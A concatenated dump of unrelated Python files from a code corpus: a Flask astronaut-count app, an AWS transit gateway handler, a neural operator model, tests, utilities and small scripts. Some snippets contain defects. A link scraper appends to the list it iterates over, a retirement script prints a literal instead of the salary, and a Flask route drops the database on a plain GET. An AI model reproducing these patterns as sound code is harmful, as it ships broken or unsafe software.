def __init__(self, size, padding=b'\x00', padding_direction=PADDING_DIRECTION_RIGHT):
super(PaddedStringMarshal, self).__init__(ConstReader(size), padding, padding_direction)
self.size = size
def write_to_stream(self, obj, stream, context=EMPTY_CONTEXT):
stripped_obj = _strip(obj, self.padding_direction, self.padding)
stream.write(stripped_obj)
if len(stripped_obj) < self.size:
stream.write(pad(self.padding[0], (self.size - len(stripped_obj))))
class VarSizeBufferMarshal(VarSizeStringMarshal):
def __init__(self, size_marshal):
super(VarSizeBufferMarshal, self).__init__(size_marshal, padding=b'', padding_direction=PADDING_DIRECTION_NONE)
class FixedSizeBufferMarshal(PaddedStringMarshal):
def __init__(self, size):
super(FixedSizeBufferMarshal, self).__init__(size, padding=b'', padding_direction=PADDING_DIRECTION_NONE)
|
StarcoderdataPython
|
4855317
|
"""Example of a single file flask application that uses and open notify API"""
from flask import Flask, redirect
from datetime import datetime
from flask_sqlalchemy import SQLAlchemy
import requests
# Create Flask application instance
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db.sqlite3"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
DB = SQLAlchemy(app)
# Runs root when we visit "/" endpoint
@app.route("/")
def root():
astro_data = Astro.query.all()
return f'{astro_data}'
@app.route("/refresh")
def refresh():
request = requests.get("http://api.open-notify.org/astros.json")
astro_python_dict = request.json()
num_of_astros = astro_python_dict["number"]
record = Astro(num_astros=num_of_astros, time=datetime.now())
DB.session.add(record)
DB.session.commit()
return redirect("/")
@app.route("/reset_db")
def reset():
DB.drop_all()
DB.create_all()
return redirect("/refresh")
# Creating SQLAlchemy sqlite DB
# Creates Astro table
class Astro(DB.Model):
id = DB.Column(DB.Integer, primary_key=True)
num_astros = DB.Column(DB.Integer, nullable=False)
time = DB.Column(DB.String, nullable=False)
def __repr__(self):
return f"# of Astros: {self.num_astros} at {self.time}"
|
StarcoderdataPython
|
12844097
|
###############################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the "license" file accompanying this file. This file is distributed #
# on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the #
# specific language governing permissions #
# and limitations under the License. #
###############################################################################
# !/bin/python
from botocore.exceptions import ClientError
from lib.decorator import try_except_retry
from aws.utils.boto3_session import Boto3Session
class TgwPeeringAttachmentAPIHandler(Boto3Session):
def __init__(self, logger, region, **kwargs):
self.logger = logger
self.__service_name = 'ec2'
self.region = region
kwargs.update({'region': self.region})
super().__init__(self.logger, self.__service_name, **kwargs)
self.ec2_client = super().get_client()
@try_except_retry()
def describe_transit_gateway_peering_attachments(self,
tgw_id: str,
states: list) -> list:
"""
Describe the tgw peering attachments for the tagged tgw id
:param tgw_id: tgw id of the tagged transit gateway
:param states: use the state to limit the returned response
:return: list of transit gateway peering attachments
"""
try:
response = self.ec2_client\
.describe_transit_gateway_peering_attachments(
Filters=[
{
'Name': 'transit-gateway-id',
'Values': [tgw_id]
},
{
'Name': 'state',
'Values': states
}
]
)
transit_gateway_peering_attachments_list = response.get(
'TransitGatewayPeeringAttachments', [])
next_token = response.get('NextToken', None)
while next_token is not None:
self.logger.info("Handling Next Token: {}".format(next_token))
response = self.ec2_client\
.describe_transit_gateway_peering_attachments(
Filters=[
{
'Name': 'transit-gateway-id',
'Values': [tgw_id]
},
{
'Name': 'state',
'Values': states
}
],
NextToken=next_token)
self.logger.info("Extending TGW Peering Attachment List")
transit_gateway_peering_attachments_list \
.extend(response.get('TransitGatewayPeeringAttachments',
[]))
next_token = response.get('NextToken', None)
return transit_gateway_peering_attachments_list
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
def create_transit_gateway_peering_attachment(self,
tgw_id: str,
peer_tgw_id: str,
peer_account_id,
peer_region) -> dict:
"""
Create tgw peering attachment
:param tgw_id: REQUIRED - transit gateway id of the local region
:param peer_tgw_id: REQUIRED - id for peer transit gateway hosted in
the peer region
:param peer_account_id: REQUIRED - current account id
:param peer_region: peer region where peer transit gateway is hosted
:return: details for the tgw peering attachment
"""
try:
response = self.ec2_client\
.create_transit_gateway_peering_attachment(
TransitGatewayId=tgw_id,
PeerTransitGatewayId=peer_tgw_id,
PeerAccountId=peer_account_id,
PeerRegion=peer_region,
)
return response.get('TransitGatewayPeeringAttachment')
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
def delete_transit_gateway_peering_attachment(self,
tgw_attach_id: str) -> str:
"""
Delete tgw peering attachment
:param tgw_attach_id: REQUIRED - transit gateway peering attachment id
:return: current state of the peering attachment
"""
try:
response = self.ec2_client\
.delete_transit_gateway_peering_attachment(
TransitGatewayAttachmentId=tgw_attach_id
)
return response.get('TransitGatewayPeeringAttachment').get('State')
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
def accept_transit_gateway_peering_attachment(self,
tgw_attach_id: str) -> str:
"""
Accept tgw peering attachment
:param tgw_attach_id: REQUIRED - transit gateway peering attachment id
:return: current state of the peering attachment
"""
try:
response = self.ec2_client\
.accept_transit_gateway_peering_attachment(
TransitGatewayAttachmentId=tgw_attach_id
)
return response.get('TransitGatewayPeeringAttachment').get('State')
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
def get_transit_gateway_peering_attachment_state(self,
tgw_attachment_id) -> list:
"""
Describe the tgw peering attachments for the tagged tgw id
:param tgw_attachment_id: tgw id of the tagged transit gateway
:return: list of transit gateway peering attachments
"""
try:
response = self.ec2_client\
.describe_transit_gateway_peering_attachments(
TransitGatewayAttachmentIds=[tgw_attachment_id])
transit_gateway_peering_attachments_list = response.get(
'TransitGatewayPeeringAttachments', [])
next_token = response.get('NextToken', None)
while next_token is not None:
self.logger.info(
"Handling Next Token: {}".format(next_token))
response = self.ec2_client \
.describe_transit_gateway_peering_attachments(
TransitGatewayAttachmentIds=[tgw_attachment_id],
NextToken=next_token)
self.logger.info("Extending TGW Peering Attachment List")
transit_gateway_peering_attachments_list \
.extend(response.get('TransitGatewayPeeringAttachments',
[]))
next_token = response.get('NextToken', None)
state = transit_gateway_peering_attachments_list[0].get('State')
return state
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
|
StarcoderdataPython
|
9646830
|
<reponame>Forbu/fourier_neural_operator
"""
@author: <NAME> This file is the Fourier Neural Operator for 2D problem such
as the Navier-Stokes equation discussed in Section 5.3 in the
[paper](https://arxiv.org/pdf/2010.08895.pdf), which uses a recurrent structure
to propagates in time.
this part of code is taken from :
https://github.com/alasdairtran/fourierflow/tree/97e6cfb0848e44d3a7bc1d063b1ab86bc4c603ee
"""
from functools import partial
import torch
import torch.nn as nn
from einops import rearrange
from einops.layers.torch import Rearrange, Reduce
from einops import rearrange, reduce, repeat
import numpy as np
import fourier_neural_operator.layers.fourier_2d_factorized_v2 as fourier_2d_factorized_v2
import fourier_neural_operator.layers.linear as linear
class ffno_v2(nn.Module):
def __init__(self, modes, width, input_dim=12, output_dim=1, dropout=0.0, in_dropout=0.0,
n_layers=4, linear_out: bool = False, share_weight: bool = False,
avg_outs=False, next_input='subtract', share_fork=False, factor=2,
norm_locs=[], group_width=16, ff_weight_norm=False, n_ff_layers=2,
gain=1, layer_norm=False, use_fork=False, mode='full'):
super().__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desire channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the previous 10 timesteps + 2 locations (u(t-10, x, y), ..., u(t-1, x, y), x, y)
input shape: (batchsize, x=64, y=64, c=12)
output: the solution of the next timestep
output shape: (batchsize, x=64, y=64, c=1)
"""
self.modes = modes
self.width = width
self.input_dim = input_dim
self.in_proj = linear.WNLinear(input_dim + 2, self.width, wnorm=ff_weight_norm)
self.drop = nn.Dropout(in_dropout)
self.next_input = next_input
self.avg_outs = avg_outs
self.n_layers = n_layers
self.norm_locs = norm_locs
self.use_fork = use_fork
# input channel is 12: the solution of the previous 10 timesteps + 2 locations (u(t-10, x, y), ..., u(t-1, x, y), x, y)
self.forecast_ff = self.backcast_ff = None
if share_fork:
if use_fork:
self.forecast_ff = fourier_2d_factorized_v2.FeedForward(
width, factor, ff_weight_norm, n_ff_layers, layer_norm, dropout)
self.backcast_ff = fourier_2d_factorized_v2.FeedForward(
width, factor, ff_weight_norm, n_ff_layers, layer_norm, dropout)
self.fourier_weight = None
if share_weight:
self.fourier_weight = nn.ParameterList([])
for _ in range(2):
weight = torch.FloatTensor(width, width, modes, modes, 2)
param = nn.Parameter(weight)
nn.init.xavier_normal_(param, gain=gain)
self.fourier_weight.append(param)
self.spectral_layers = nn.ModuleList([])
for _ in range(n_layers):
self.spectral_layers.append(fourier_2d_factorized_v2.SpectralConv2d(in_dim=width,
out_dim=width,
n_modes=modes,
forecast_ff=self.forecast_ff,
backcast_ff=self.backcast_ff,
fourier_weight=self.fourier_weight,
factor=factor,
norm_locs=norm_locs,
group_width=group_width,
ff_weight_norm=ff_weight_norm,
n_ff_layers=n_ff_layers,
layer_norm=layer_norm,
use_fork=use_fork,
dropout=dropout,
mode=mode))
self.out = nn.Sequential(
linear.WNLinear(self.width, 128, wnorm=ff_weight_norm),
linear.WNLinear(128, output_dim, wnorm=ff_weight_norm))
def forward(self, x, **kwargs):
# x.shape == [n_batches, *dim_sizes, input_size]
grid = self.get_grid(x.shape, x.device)
x = torch.cat((x, grid), dim=-1)
forecast = 0
x = self.in_proj(x)
x = self.drop(x)
forecast_list = []
for i in range(self.n_layers):
layer = self.spectral_layers[i]
b, f = layer(x)
if self.use_fork:
f_out = self.out(f)
forecast = forecast + f_out
forecast_list.append(f_out)
if self.next_input == 'subtract':
x = x - b
elif self.next_input == 'add':
x = x + b
if not self.use_fork:
forecast = self.out(b)
if self.avg_outs:
forecast = forecast / len(self.spectral_layers)
return forecast
def get_grid(self, shape, device):
batchsize, size_x, size_y = shape[0], shape[1], shape[2]
gridx = torch.tensor(np.linspace(0, 1, size_x), dtype=torch.float)
gridx = gridx.reshape(1, size_x, 1, 1).repeat([batchsize, 1, size_y, 1])
gridy = torch.tensor(np.linspace(0, 1, size_y), dtype=torch.float)
gridy = gridy.reshape(1, 1, size_y, 1).repeat([batchsize, size_x, 1, 1])
return torch.cat((gridx, gridy), dim=-1).to(device)
|
StarcoderdataPython
|
11234635
|
from getFolderFromRepo import *
def test_proper_filepath():
def is_valid_filepath(path: str) -> bool:
# should start with /
# should not end with /
# so it should be / or /a or /a.../b
assert path.startswith("/")
if len(path) != 1:
assert not path.endswith("/")
paths = ["", "/", "/a", "/a/", "//", "a/b", "/a/b", "/a/b/"]
for path in paths:
proper_path = proper_filepath(path)
print(path, proper_path, sep="\t\t")
is_valid_filepath(proper_path)
def test_rel_path():
import os
for data in [
("https://github.com/owner/repo", "repo", "file", "repo/file"),
("https://github.com/owner/repo", "repo", "folder1/file", "repo/folder1/file"),
("https://github.com/owner/repo/tree/branch/folder1", "folder1", "folder1/file", "folder1/file"),
("https://github.com/owner/repo/tree/branch/folder1/folder2", "folder2", "folder1/folder2/file", "folder2/file"),
("https://github.com/owner/repo/blob/branch/folder1/folder2/file", "file", "folder1/folder2/file", "file"),
]:
url, last_element, path, new_path = data
assert get_last_element(url) == last_element
assert get_new_path(path, last_element) == new_path
if __name__ == "__main__":
test_proper_filepath()
test_rel_path()
|
StarcoderdataPython
|
3254863
|
import numpy as np
import h5py
import os
from wormpose.dataset.loader import load_dataset
def save_results(dataset_loader, dataset_path, results_root_dir):
dataset = load_dataset(dataset_loader, dataset_path)
all_scores = []
all_theta = []
for video_name in sorted(os.listdir(results_root_dir)):
results_file = os.path.join(results_root_dir, video_name, "results.h5")
features = dataset.features_dataset[video_name]
timestamp = features.timestamp
with h5py.File(results_file, "r") as f:
scores = f["unaligned"]["scores"][:]
thetas = f["unaligned"]["theta"][:]
max_scores = np.argmax(scores, axis=1)
results_scores = scores[np.arange(scores.shape[0]), max_scores]
results_theta = thetas[np.arange(thetas.shape[0]), max_scores]
non_resampled_scores = []
non_resampled_theta= []
for cur_time, (score, theta) in enumerate(zip(results_scores, results_theta)):
frame_index = np.where(timestamp == cur_time)[0]
if len(frame_index) == 0:
continue
cur_frame_index = frame_index[0]
non_resampled_scores.append(score)
non_resampled_theta.append(theta)
all_scores.append(non_resampled_scores)
all_theta.append(non_resampled_theta)
print(video_name, len(non_resampled_scores))
all_scores = np.concatenate(all_scores)
all_theta = np.concatenate(all_theta)
print(len(all_scores))
np.savetxt("all_scores.txt", all_scores)
np.save("all_theta.npy", all_theta)
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("dataset_loader", type=str, help="Dataset loader (tierpsy or other)")
parser.add_argument("dataset_path", type=str, help="root path of a wormpose Dataset")
parser.add_argument("results_root_dir", type=str, help="Root folder where to find wormpose results")
args = parser.parse_args()
save_results(**vars(args))
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
8112844
|
<gh_stars>1-10
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Publisher constants: request commands and parameters, response header names.
"""
# Delimiter for multi-part parameters (array-parameters).
MULTI_PART_PARAMETER_DELIMITER = ","
POI_SEARCH_SERVICE_NAME = "POISearch"
DEFAULT_SEARCH_SERVICE_NAME = "GeocodingFederated"
HOST_NAME = "Host"
# Request commands.
CMD = "Cmd"
CMD_PING = "Ping"
CMD_RESET = "Reset"
CMD_QUERY = "Query"
CMD_ADD_DB = "AddDb"
CMD_DELETE_DB = "DeleteDb"
CMD_CLEANUP_DB = "CleanupDb"
CMD_PUBLISH_DB = "PublishDb"
CMD_REPUBLISH_DB = "RepublishDb"
CMD_SWAP_TARGETS = "SwapTargets"
CMD_UNPUBLISH_DB = "UnPublishDb"
CMD_SYNC_DB = "SyncDb"
CMD_ADD_VS = "AddVs"
CMD_DELETE_VS = "DeleteVs"
CMD_DISABLE_VS = "DisableVs"
CMD_ADD_SEARCH_DEF = "AddSearchDef"
CMD_DELETE_SEARCH_DEF = "DeleteSearchDef"
CMD_ADD_PLUGIN = "AddPlugin"
CMD_DELETE_PLUGIN = "DeletePlugin"
CMD_DECREMENT_COUNT = "DecrementCount"
CMD_LOCAL_TRANSFER = "LocalTransfer"
CMD_GARBAGE_COLLECT = "GarbageCollect"
CMD_CLEANUP = "Cleanup"
CMD_ADD_SNIPPET_SET = "AddSnippetSet"
CMD_DELETE_SNIPPET_SET = "DeleteSnippetSet"
# Request Params.
QUERY_CMD = "QueryCmd"
QUERY_CMD_LIST_DBS = "ListDbs"
QUERY_CMD_LIST_ASSETS = "ListAllAssets"
QUERY_CMD_DB_DETAILS = "DbDetails"
QUERY_CMD_LIST_VSS = "ListVss"
QUERY_CMD_VS_DETAILS = "VsDetails"
QUERY_CMD_LIST_TGS = "ListTgs"
QUERY_CMD_TARGET_DETAILS = "TargetDetails"
QUERY_CMD_LIST_SEARCH_DEFS = "ListSearchDefs"
QUERY_CMD_SEARCH_DEF_DETAILS = "SearchDefDetails"
QUERY_CMD_LIST_SNIPPET_SETS = "ListSnippetSets"
QUERY_CMD_SNIPPET_SET_DETAILS = "SnippetSetDetails"
QUERY_CMD_LIST_META_FIELD_PATHS = "ListMetaFieldPaths"
QUERY_CMD_META_FIELDS_SET = "MetaFieldsSet"
QUERY_CMD_PUBLISHED_DB_DETAILS = "PublishedDbDetails"
QUERY_CMD_PUBLISHED_DBS = "PublishedDbs"
QUERY_CMD_SERVER_PREFIX = "ServerPrefix"
QUERY_CMD_HOST_ROOT = "HostRoot"
QUERY_CMD_SERVER_HOST = "ServerHost"
QUERY_CMD_ALLOW_SYM_LINKS = "AllowSymLinks"
QUERY_CMD_LIST_PLUGIND = "ListPlugins"
QUERY_CMD_GEDB_PATH = "GeDbPath"
DB_ID = "DbId"
DB_NAME = "DbName"
DB_PRETTY_NAME = "DbPrettyName"
DB_TYPE = "DbType"
DB_TIMESTAMP = "DbTimestamp"
DB_SIZE = "DbSize"
DB_USE_GOOGLE_BASEMAP = "DbUseGoogleBasemap"
FILE_PATH = "FilePath"
FILE_SIZE = "FileSize"
VS_NAME = "VsName"
VS_TYPE = "VsType"
VS_URL = "VsUrl"
VS_SSL = "VsSsl"
VS_CACHE_LEVEL = "VsCacheLevel"
PLUGIN_NAME = "PluginName"
CLASS_NAME = "ClassName"
SEARCH_URL = "SearchUrl"
SEARCH_VS_NAME = "SearchVsName"
DEST_FILE_PATH = "DestFilePath"
FORCE_COPY = "ForceCopy"
PREFER_COPY = "PreferCopy"
TARGET_PATH = "TargetPath"
TARGET_PATH_A = "TargetPathA"
TARGET_PATH_B = "TargetPathB"
VIRTUAL_HOST_NAME = "VirtualHostName"
SEARCH_DEF_NAME = "SearchDefName"
SUPPLEMENTAL_SEARCH_DEF_NAME = "SupSearchDefName"
SEARCH_DEF = "SearchDef"
POI_FEDERATED = "PoiFederated"
POI_SUGGESTION = "PoiSuggestion"
NEED_SEARCH_TAB_ID = "NeedSearchTabId"
SUPPLEMENTAL_UI_LABEL = "SupUiLabel"
SNIPPET_SET_NAME = "SnippetSetName"
SNIPPET_SET = "SnippetSet"
SERVE_WMS = "ServeWms"
EC_DEFAULT_DB = "EcDefaultDb"
ORIGIN_REQUEST_HOST = "OriginRequestHost"
# Response header names.
HDR_STATUS_CODE = "Gepublish-StatusCode"
HDR_STATUS_MESSAGE = "Gepublish-StatusMessage"
HDR_FILE_NAME = "Gepublish-FileName"
HDR_PLUGIN_DETAILS = "Gepublish-PluginDetails"
HDR_HOST_NAME = "Gepublish-HostName"
HDR_DB_NAME = "Gepublish-DbName"
HDR_DB_PRETTY_NAME = "Gepublish-DbPrettyName"
HDR_TARGET_PATH = "Gepublish-TargetPath"
HDR_VS_TYPE = "Gepublish-VsType"
HDR_VS_NAME = "Gepublish-VsName"
HDR_SERVER_PREFIX = "Gepublish-ServerPrefix"
HDR_SERVER_HOST = "Gepublish-ServerHost"
HDR_SERVER_HOST_FULL = "Gepublish-ServerHostFull"
HDR_ALLOW_SYM_LINKS = "Gepublish-AllowSymLinks"
HDR_VS_URL = "Gepublish-VsUrl"
HDR_DB_ID = "Gepublish-DbId"
HDR_HOST_ROOT = "Gepublish-HostRoot"
HDR_DELETE_COUNT = "Gepublish-DeleteCount"
HDR_DELETE_SIZE = "Gepublish-DeleteSize"
HDR_SEARCH_URL = "Gepublish-SearchUrl"
HDR_PLUGIN_NAME = "Gepublish-PluginName"
HDR_PLUGIN_CLASS_NAME = "Gepublish-PluginClassName"
HDR_DATA = "Gepublish-Data"
HDR_JSON_RESULTS = "results"
HDR_JSON_STATUS_CODE = "status_code"
HDR_JSON_STATUS_MESSAGE = "status_message"
# TODO: Get from mod_fdb!?
CUTTER_GLOBES_PATH = "/opt/google/gehttpd/htdocs/cutter/globes"
# Response status codes.
STATUS_FAILURE = -1
STATUS_SUCCESS = 0
STATUS_UPLOAD_NEEDED = 1
|
StarcoderdataPython
|
3447483
|
try:
from normatrix.source.file_parser import CFileParse
from normatrix.source.config import TypeLine
except ModuleNotFoundError:
from normatrix.normatrix.source.file_parser import CFileParse
from normatrix.normatrix.source.config import TypeLine
import re
reg = re.compile('^(?!.*=)(\w{1,} {0,1}){2,}\((.*?\n{0,1}){0,}?\) {0,1}\n{0,1}\{')
def get_only_func_decl(rest: str):
res = reg.match(rest)
if res != None:
only_decl = rest[res.start():res.end()]
if "=" in only_decl or ";" in only_decl:
return ''
return only_decl
return ''
def check(context, file: CFileParse) -> (int, int, list):
nb_error = 0
list_error = []
if file.basename.endswith('.h') or file.filepath.endswith("Makefile"):
return (0, 0, [])
for i, line in enumerate(file.sub_parsedline):
if line[0] == TypeLine.COMMENT:
continue
all_lines = file.sub_parsedline[i:]
rest_lines = "\n".join([x[1] for x in all_lines])
only_decl = get_only_func_decl(rest_lines)
only_decl = re.sub("\(\*\w*?\)\((.|\n)*?\)", "", only_decl)
n = only_decl.count(',') + 1
if n > 4:
list_error.append((i + 1, f"too many arguments ({n} > 4)"))
nb_error += 1
return (nb_error, 0, list_error)
|
StarcoderdataPython
|
3204007
|
<filename>vscreenml_v2/binana/_cli_params/__init__.py<gh_stars>0
# This file is part of BINANA, released under the Apache 2.0 License. See
# LICENSE.md or go to https://opensource.org/licenses/Apache-2.0 for full
# details. Copyright 2020 <NAME>.
|
StarcoderdataPython
|
1784457
|
from datetime import date
trab = {}
trab["Nome"] = str(input("Nome: "))
Nascimento = int(input("Ano de nascimento: "))
trab["idade"] = date.today().year - Nascimento
trab["CTPS"] = int(input("CTPS (0 não tem): "))
if trab["CTPS"] == 0:
print(30*'-=')
print(trab)
print(f"Nome tem o valor de {trab['Nome']} \nIdade tem o valor de {trab['idade']} \nCTPS tem o valor de {trab['CTPS']}")
else:
trab["Contratação"] = int(input("Ano de contratação: "))
trab["Salario"] = float(input('Salário: R$ '))
contribuido = (date.today().year - trab['Contratação'])
aposentadoria = (35 - contribuido) + trab["idade"]
print(30*'-=')
print(trab)
print(f"Nome tem o valor {trab['Nome']} \nIdate tem o valor de {trab['idade']} \nCTPS tem o valor de {trab['CTPS']}, \nContratação tem o valor de {trab['Contratação']} \nSalário tem o valor de {'Salario'} \nAposentadoria tem o valor de {aposentadoria}")
#aposentadoria: necessário 35 anos de contribuição a partir da data do primeiro registro
# exemplo: idade: 40, contribuiçao: 25 anos
#trab["Aposentadoria"] = 17
|
StarcoderdataPython
|
6557537
|
<reponame>objarni/remind-tests<filename>browser.py
# coding: utf-8
# Standard
import time
# Third party
from selenium import webdriver
class BrowserSimulator():
def __init__(self, headless=True):
if headless:
from pyvirtualdisplay import Display
display = Display(visible=0, size=(800, 600))
display.start()
self.driver = webdriver.Firefox()
def go_to(self, url):
print u"Going to %s. " % url
self.driver.get(url)
def fill_in(self, name, text):
print u"Writing '%s' in textarea named '%s'." % (text, name)
e = self.driver.find_element_by_name(name)
e.clear()
e.send_keys(text)
def click_button(self, name):
print u"Clicking button named '%s'." % name
e = self.driver.find_element_by_name(name)
e.click()
def click_link(self, id):
print u"Clicking link '%s'." % id
e = self.driver.find_element_by_id(id)
e.click()
def get_title(self):
print u"Title is '%s'." % self.driver.title
return self.driver.title
def get_text(self, id):
e = self.driver.find_element_by_id(id)
text = e.text
print u"Element '%s' text is '%s'." % (id, text)
return text
def verify_title(self, title):
def condition():
return self.get_title() == title
wait_for(condition, u"Expected title to show up: " + title)
def verify_text(self, id, text):
def condition():
return text in self.get_text(id)
wait_for(condition, u"Expected text to show up: " + text)
def verify_text_gone(self, id, text):
def condition():
return text not in self.get_text(id)
wait_for(condition, u"Expected text to disappear: " + text)
def close_browser(self):
print "Closing browser."
self.driver.close()
def wait_for(predicate, exception_text):
timeout = 3
acc = 0
while acc < timeout:
if predicate():
return
time.sleep(1)
acc += 1
raise Exception(exception_text)
|
StarcoderdataPython
|
6992
|
import requests
from bs4 import BeautifulSoup
def recursiveUrl(url, link, depth):
if depth == 5:
return url
else:
print(link['href'])
page = requests.get(url + link['href'])
soup = BeautifulSoup(page.text, 'html.parser')
newlink = soup.find('a')
if len(newlink) == 0:
return link
else:
return link, recursiveUrl(url, newlink, depth + 1)
def getLinks(url):
page = requests.get(url)
soup = BeautifulSoup(page.text, 'html.parser')
links = soup.find_all('a')
for link in links:
links.append(recursiveUrl(url, link, 0))
return links
links = getLinks("http://www.reddit.com/")
print(links)
|
StarcoderdataPython
|
8167195
|
from django.contrib import admin
from .models import Message
class MessageAdmin(admin.ModelAdmin):
list_display = ('message', 'room', 'created')
admin.site.register(Message, MessageAdmin)
|
StarcoderdataPython
|
8096850
|
import unittest
from yomi.main import convert
class YomiTestCase(unittest.TestCase):
def setUp(self):
print("setUp!!")
def tearDown(self):
print("tearDown!!")
def test_yakiniku(self):
self.assertEqual(convert('焼肉定食'), ['ヤ', 'キ', 'ニ', 'k', 'テ', 'イ', 'シ', 'ョ', 'k'])
|
StarcoderdataPython
|
6472196
|
import numpy as np
from layer import Layer
from coder import Coder
class Sequencer(object):
def __init__(self, sequence_layer, input_layers):
self.sequence_layer = sequence_layer
self.input_layers = input_layers
self.transits = []
def add_transit(self, new_state=None, **input_states):
# Generate states if not provided, encode as necessary
if new_state is None:
new_state = self.sequence_layer.activator.make_pattern()
if type(new_state) is str:
new_state = self.sequence_layer.coder.encode(new_state)
for name, pattern in input_states.items():
if type(pattern) is str:
input_states[name] = self.input_layers[name].coder.encode(pattern)
# Check for non-determinism
for n, i in self.transits:
# Same new state
if self.sequence_layer.activator.e(n, new_state).all(): continue
# Different input layers
if set(i.keys()) != set(input_states.keys()): continue
# Different input patterns
if any((i[l] != p).any() for l,p in input_states.items()): continue
# Otherwise non-deterministic
raise Exception("Created non-deterministic transit!")
# Save transit
self.transits.append((new_state, input_states))
# Return new state
return new_state
def flash(self, verbose):
# Unzip transits
all_new_states, all_input_states = zip(*self.transits)
P = len(self.transits)
# Populate input matrices
X = {}
for i, input_states in enumerate(all_input_states):
for name, pattern in input_states.items():
if name not in X: X[name] = np.zeros((pattern.shape[0]+1, P))
X[name][:-1, [i]] = pattern
X[name][-1, i] = 1. # bias
# Fix layer order, make sure sequence layer comes first for zsolve
# explicitly convert to list for python3
names = list(X.keys())
names.remove(self.sequence_layer.name)
names.insert(0, self.sequence_layer.name)
# Solve with hidden step
X = np.concatenate([X[name] for name in names], axis=0)
Y = np.concatenate(all_new_states, axis=1)
W, Z, residual = zsolve(X, Y,
self.sequence_layer.activator.f,
self.sequence_layer.activator.g,
verbose=verbose)
# Split up weights and biases
weights = {}
biases = {}
offset = 0
for name in names:
pair_key = (self.sequence_layer.name, name)
layer_size = self.input_layers[name].size
weights[pair_key] = W[:,offset:offset + layer_size]
biases[pair_key] = W[:,[offset + layer_size]]
offset += layer_size + 1
# return final weights, bias, matrices, residual
return weights, biases, (X, Y, Z), residual
def zsolve(X, Y, f, g, verbose=False):
"""
Construct W that transitions states in X to corresponding states in Y
X, Y are arrays, with paired activity patterns as columns
f, g are the activation function and its inverse
To deal with low-rank X, each transition uses an intermediate "hidden step"
"""
# size of layer being sequenced
N = Y.shape[0]
# for low-rank X, get coefficients A of X's column space
_, sv, A = np.linalg.svd(X, full_matrices=False)
rank_tol = sv.max() * max(X.shape) * np.finfo(sv.dtype).eps # from numpy
A = A[sv > rank_tol, :]
# use A to set intermediate Z that is low-rank pre non-linearity
Z = np.zeros(X.shape)
Z[:N,:] = f(np.random.randn(N, A.shape[0]).dot(A))
Z[N,:] = 1. # bias
# solve linear equations
XZ = np.concatenate((X, Z), axis=1)
ZY = np.concatenate((Z[:N,:], Y), axis=1)
W = np.linalg.lstsq(XZ.T, g(ZY).T, rcond=None)[0].T
residual = np.fabs(ZY - f(W.dot(XZ))).max()
if verbose: print("Sequencer flash residual = %f"%residual)
# solution and hidden patterns
return W, Z, residual
if __name__ == '__main__':
np.set_printoptions(linewidth=200, formatter = {'float': lambda x: '% .2f'%x})
N = 8
PAD = 0.05
from activator import *
act = tanh_activator(PAD, N)
# act = logistic_activator(PAD, N)
c = Coder(act)
g = Layer("gates",N, act, c)
input_layers = {name: Layer(name, N, act, c) for name in ["gates","op1","op2"]}
s = Sequencer(g, input_layers)
v_old = g.coder.encode("SET") # s.add_transit(new_state="SET")
for to_layer in ["FEF","SC"]:
for from_layer in ["FEF","SC"]:
v_new = s.add_transit(
new_state = to_layer + from_layer,
gates = v_old, op1 = to_layer, op2 = from_layer)
print(c.list_tokens())
weights, biases, _, residual = s.flash()
for k in weights:
w, b = weights[k], biases[k]
print(k)
print(w)
print(b.T)
a = {"gates":v_old, "op1":c.encode("SC"), "op2":c.encode("SC")}
wvb = np.zeros(v_old.shape)
for k in weights:
w, b = weights[k], biases[k]
wvb += w.dot(a[k[1]]) + b
z = np.zeros(v_old.shape)
a = {"gates":act.f(wvb), "op1": z, "op2":z}
wvb = np.zeros(v_old.shape)
for k in weights:
w, b = weights[k], biases[k]
wvb += w.dot(a[k[1]]) + b
v_test = act.f(wvb)
for v in [v_old, v_test, v_new]:
print(c.decode(v), v.T)
print(act.e(v_test, v_new).T)
|
StarcoderdataPython
|
165477
|
<filename>scrawl/pages_utils.py
import os
from flask import current_app, safe_join
from scrawl.utils import find_pages, full_directory_remove
def get_pages(work_directory: str):
pages = []
dir_content = os.listdir(work_directory)
for name in dir_content:
fullname = os.path.join(work_directory, name)
if os.path.isdir(fullname):
pages.append(name)
return pages
def get_sub_pages(page_name: str, sub_name_pages: list, work_directory: str):
pages = []
dir_content = os.listdir(os.path.join(work_directory, page_name))
for name in dir_content:
fullname = os.path.join(work_directory, page_name, name)
if os.path.isdir(fullname):
pages.append(name)
return pages
def update_page(content: str, page_name: str, work_directory: str):
full_file_path = safe_join(work_directory, page_name, 'content.html')
if os.path.exists(full_file_path): # Checking for page existence
with open(full_file_path, 'w', encoding='utf-8') as f:
f.write(content)
return True
return False
def get_page(page_name: str, work_directory: str):
full_file_path = safe_join(work_directory, page_name, 'content.html')
if os.path.exists(full_file_path): # Checking for page existence
with open(full_file_path, 'r', encoding='utf-8') as f:
content = f.read()
page_name, sub_name_pages = find_pages(page_name)
sub_pages = get_sub_pages(
page_name=page_name,
sub_name_pages=sub_name_pages,
